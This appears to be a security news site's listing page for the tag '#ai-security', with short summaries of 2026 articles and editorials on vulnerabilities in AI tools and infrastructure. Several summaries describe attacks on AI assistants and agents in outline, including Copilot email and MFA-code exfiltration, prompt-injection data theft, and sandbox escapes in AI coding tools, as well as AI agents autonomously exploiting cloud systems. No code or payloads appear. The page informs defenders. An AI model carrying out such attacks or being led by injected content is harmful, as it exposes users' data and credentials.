// #ai-security
19 articles
Microsoft 365 Copilot 'SearchLeak' CVE-2026-42824 — One-Click Exfiltration of Emails, Files, and MFA Codes
Varonis Threat Labs chained three vulnerabilities in Microsoft 365 Copilot into a single attack that exfiltrates emails, corporate files, and MFA authentication codes from a victim's account with a single click on a malicious link. Microsoft patched all three flaws server-side; no client update is required, but the disclosure illuminates the structural risks of embedding AI systems with broad data access into enterprise environments.
The AI Infrastructure Security Deficit: Langflow, LiteLLM, and a Repeating Pattern
Two AI infrastructure components — Langflow and LiteLLM — have reached the CISA Known Exploited Vulnerabilities catalogue in June 2026, both with command injection vulnerabilities in Python-based AI tooling. The pattern reflects a systemic gap: AI infrastructure is being deployed in enterprise environments under procurement and security processes designed for end-user applications, not for server-side infrastructure with network-accessible APIs.
OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration
OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.
ChromaDB CVSS 10.0 Pre-Auth RCE CVE-2026-45829: AI Vector Database Compromise via HuggingFace Model Injection
HiddenLayer and the Cloud Security Alliance published disclosures of CVE-2026-45829, a CVSS 10.0 unauthenticated remote code execution vulnerability in ChromaDB's Python FastAPI server, on 18–20 May 2026. Attackers can inject malicious code via a crafted HuggingFace-hosted model before the authentication gate fires. Approximately 73% of ChromaDB deployments are internet-exposed. No patch exists for affected versions.
Securing RAG Pipeline Architecture: Vector Databases Are the New Unmanaged Attack Surface in Enterprise AI
The ChromaDB CVE-2026-45829 disclosure exposes a systemic architectural gap in enterprise AI deployments: vector databases used in retrieval-augmented generation pipelines are being deployed without the security controls applied to comparable databases handling sensitive data. The attack surface analysis and architectural recommendations for secure RAG pipeline design apply regardless of which vector database product is in use.
AI Coding Agents in CI/CD Pipelines: Mapping the Attack Surface After Pwn2Own AI Category Results
The Pwn2Own Berlin 2026 AI category results — five products exploited — have a compounding implication for organisations where AI coding agents are integrated with CI/CD pipelines, code repositories, and cloud deployment infrastructure. An exploited AI agent running in a pipeline is not a developer workstation compromise; it is a supply chain entry point.
AI Coding Environments Join Pwn2Own Target List: LM Studio and OpenAI Codex Exploited via Sandbox Escapes
Pwn2Own Berlin 2026 introduced an AI products category and saw both LM Studio and OpenAI Codex exploited on the same day through sandbox escapes and environment variable injection. The results raise urgent questions about the security of AI development tools running inside enterprise environments with access to code repositories, credentials, and production pipelines.
Google GTIG Confirms First AI-Developed Zero-Day Used in Active Exploitation — 2FA Bypass via Automated Vulnerability Discovery
Google's Threat Intelligence Group has confirmed the first documented case of a threat actor using AI tools to discover and develop a working zero-day exploit deployed in a live attack campaign. The target was a 2FA bypass in a widely-used open-source web administration tool. A separate China-aligned actor was also found using AI platforms for automated offensive reconnaissance.
Fake OpenAI Repository on Hugging Face Reached #1 Trending, Delivered Rust Infostealer to 244,000 Users
A malicious repository impersonating an official OpenAI project reached the top trending position on Hugging Face before being removed — delivering a Rust-compiled infostealer to an estimated 244,000 users who executed the repository's loader script. The attack exploited Hugging Face's trending algorithm and the high trust developers place in repositories attributed to the OpenAI organisation. Affected users should rotate all credentials accessible from the compromised machine.
Spring AI CVE-2026-40978 and CVE-2026-40967 — SQL Injection and Filter Expression Injection in RAG Vector Store Components
Two injection vulnerabilities in Spring AI's vector store integration layer affect AI applications using retrieval-augmented generation pipelines. CVE-2026-40978 (CVSS 8.8) allows SQL injection through the CosmosDB vector store component; CVE-2026-40967 (CVSS 8.6) enables filter expression injection in the FilterExpressionConverter used across multiple backends. Both flaws affect Spring AI 1.0.x and 1.1.x and are patched in 1.1.5.
AI Agents Can Autonomously Compromise Cloud Infrastructure With Minimal Human Oversight, Research Finds
New academic research demonstrates that AI agents equipped with common cloud security tools can autonomously identify, chain, and exploit misconfigurations in production-like cloud environments — achieving lateral movement, privilege escalation, and data exfiltration in multi-step attack sequences without human guidance. The findings have direct implications for red team methodologies, cloud security posture management, and the adversarial use of AI-assisted attack tooling.
Hugging Face LeRobot CVE-2026-25874 — Critical Unpatched RCE via Pickle Deserialization in Unauthenticated gRPC Endpoint
A critical unpatched remote code execution vulnerability in Hugging Face's LeRobot robotics AI framework allows unauthenticated attackers to execute arbitrary code on any server running the gRPC control interface. CVE-2026-25874, rated CVSS 9.3, affects the project's dataset loading and remote control pipeline via Python pickle deserialization. No patch is available; mitigations focus on network isolation.
LMDeploy RCE Vulnerability CVE-2026-33626 Weaponised in the Wild 13 Hours After Disclosure
A critical remote code execution flaw in LMDeploy, a widely used LLM inference serving framework, was exploited in active attacks just 13 hours after public disclosure. Organisations running self-hosted AI inference infrastructure must treat these platforms with the same urgency as any internet-exposed web application server — because attackers already do.
KTransformers AI Inference Framework Exposes Unauthenticated RCE via Pickle Deserialization — CVSS 9.8
CVE-2026-26210 is a CVSS 9.8 pre-authentication RCE in KTransformers, a popular AI inference acceleration framework. The scheduler's ZMQ ROUTER socket binds to all interfaces with no authentication and deserialises arbitrary pickle payloads — any network-reachable host can execute code on the inference server.
Marimo AI Notebook RCE CVE-2026-39987 Exploited at Scale — 662 Events in Three Days, NKAbuse Malware Deployed
CVE-2026-39987 (CVSS 9.3) in the Marimo Python notebook has been weaponised at scale, with Sysdig recording 662 exploitation events over three days and attackers completing credential theft within minutes of gaining access. The unauthenticated WebSocket RCE is being used to deploy NKAbuse, a multi-platform malware using the NKN peer-to-peer network for command and control. Upgrade to Marimo 0.23.0 immediately.
Anthropic's Claude Mythos AI Discovers Thousands of Zero-Days Across Every Major OS — Project Glasswing Offers Private Access
Anthropic's specialised vulnerability-hunting AI, Claude Mythos, has systematically discovered thousands of zero-day vulnerabilities across Windows, macOS, Linux, and major browsers — including a 17-year-old NFS RCE in FreeBSD and a 27-year-old OpenBSD denial-of-service. Project Glasswing provides private early access to Microsoft, Google, Apple, and select others. The implications for enterprise risk governance are immediate.
Cohere Terrarium AI Sandbox Escape — CVSS 9.3 WebAssembly Flaw Allows Root Code Execution on Host
CVE-2026-5752 (CVSS 9.3) in Cohere Terrarium allows an attacker to escape the Pyodide WebAssembly sandbox via JavaScript prototype chain traversal, achieving root code execution on the host Node.js process. Organisations running AI code execution environments should patch immediately and network-isolate these workloads.
Langflow RCE CVE-2026-33017 Exploited Within 20 Hours, Added to CISA KEV
A critical unauthenticated remote code execution vulnerability in Langflow AI pipeline builder was exploited in the wild within 20 hours of disclosure, with attackers harvesting API keys for OpenAI, Anthropic, and AWS from compromised instances. CISA added CVE-2026-33017 to the Known Exploited Vulnerabilities catalogue on 26 March, making patching mandatory for US federal agencies.
TeamPCP Backdoors LiteLLM on PyPI — AI Gateway Package With 3 Million Daily Downloads Compromised
The LiteLLM Python package — a widely-deployed AI gateway library with three million daily downloads — was backdoored on PyPI on 24 March by threat actor TeamPCP. Malicious versions 1.82.7 and 1.82.8 deployed a three-stage payload stealing cloud credentials, Kubernetes secrets, and CI/CD tokens from any system that installed the package during a 40-minute window.
Commentary tagged #ai-security
AI Vector Databases Are the New Attack Surface Nobody Inventoried
ChromaDB CVE-2026-45829 is a specific vulnerability in one product. The underlying problem it exposes is structural: enterprise AI deployments are creating new categories of sensitive data storage that are not subject to the security controls applied to comparable databases. The vulnerability is fixable. The architectural gap is not fixed by a patch.
CipherWatch Editorial
Security Intelligence Platform
AI at Pwn2Own Is an Admission: These Tools Were Never Secure
The addition of an AI products category at Pwn2Own Berlin 2026 — and its immediate success with five exploits across three vendors — is not evidence that AI tools are newly insecure. It is evidence that the security industry has finally started looking. The results are a lagging indicator of what has been deployed in enterprise environments for the past two years.
CipherWatch Editorial
Security Intelligence Platform
The Risk Calculus Changed Today
Google's confirmation of the first AI-developed zero-day used in live exploitation is not a warning about the future. It is a statement about the present. The security industry's habit of treating AI-assisted exploitation as a 'horizon threat' just ran out of runway.
CipherWatch Editorial
Security Intelligence Platform
AI Platforms Inherited the npm Trust Model and Its Problems Are Arriving on Schedule
A fake OpenAI repository reached #1 trending on Hugging Face and delivered an infostealer to 244,000 users. This was predictable. The AI/ML developer ecosystem adopted the open-publishing, community-trust model of package registries without adopting the hard-won security lessons those registries learned over the past decade. The attack surface Hugging Face presents in 2026 looks remarkably like the attack surface npm presented in 2016.
CipherWatch Editorial
Security Intelligence Platform
AI Didn't Make Attackers Smarter — It Removed the Barrier That Was Keeping Them Small
DPRK's AI-generated npm malware campaign is not remarkable because AI made it more sophisticated. It's remarkable because AI let a small team produce something that would previously have required many more people to build and maintain. The scale constraint on supply chain attacks has just changed fundamentally.
CipherWatch Editorial
Security Intelligence Platform
The Model Context Protocol's Security Debt Is Already Piling Up
MCP's rapid enterprise adoption has outpaced its security design. The protocol was built to solve an integration problem, not a security one — and the debt is accumulating faster than the ecosystem can audit it.
CipherWatch Editorial
Security Intelligence Platform
The 13-Hour Problem: Your AI Inference Infrastructure Is Already a Tier-One Target
LMDeploy was exploited 13 hours after its RCE vulnerability was disclosed. Langflow took 20 hours. Marimo lasted days. The pattern is not bad luck — it is the predictable consequence of treating AI inference infrastructure as development tooling while exposing it like a production web server. The window for getting ahead of this has closed.
CipherWatch Editorial
Security Intelligence Platform
AI Inference Frameworks Are a First-Class Attack Surface — and Most Enterprises Are Treating Them Like Research Tools
Two critical AI inference framework vulnerabilities disclosed this week — one exploited within 13 hours, one scoring CVSS 9.8 — reveal an uncomfortable truth: the AI toolchain has become enterprise infrastructure, but most security programmes are still treating it like a research curiosity. That gap is now being actively exploited.
CipherWatch Editorial
Security Intelligence Platform
The Hallucination Problem in Your AI Security Tools Is Not Getting Fixed
A new paper by Vishal Sikka and Varin Sikka uses settled computational complexity theory to prove that transformer hallucinations and fixed reasoning depth are architectural facts, not engineering failures. For security practitioners building operational dependencies on LLM-based tools, the implication is uncomfortable: the limitations most vendors are implicitly promising to train away cannot be trained away. They are proven.
CipherWatch Editorial
Security Intelligence Platform
AI Has Learned to Find Bugs Faster Than We Can Fix Them
Claude Mythos discovering thousands of zero-days confirms what was already theoretically obvious: AI vulnerability research is orders of magnitude faster than human-paced remediation. The industry's response — private disclosure programmes — is a delay mechanism, not a solution to the structural asymmetry between discovery speed and patch deployment speed.
CipherWatch Editorial
Security Intelligence Platform
AI Infrastructure Is Accumulating Security Debt Faster Than Anyone Admits
LangFlow's actively exploited remote code execution vulnerability and this week's LiteLLM supply chain attack are not isolated incidents — they are early symptoms of an ecosystem that has scaled faster than its security practices. Organisations deploying AI infrastructure are inheriting technical debt they have not yet been asked to account for.
CipherWatch Editorial
Security Intelligence Platform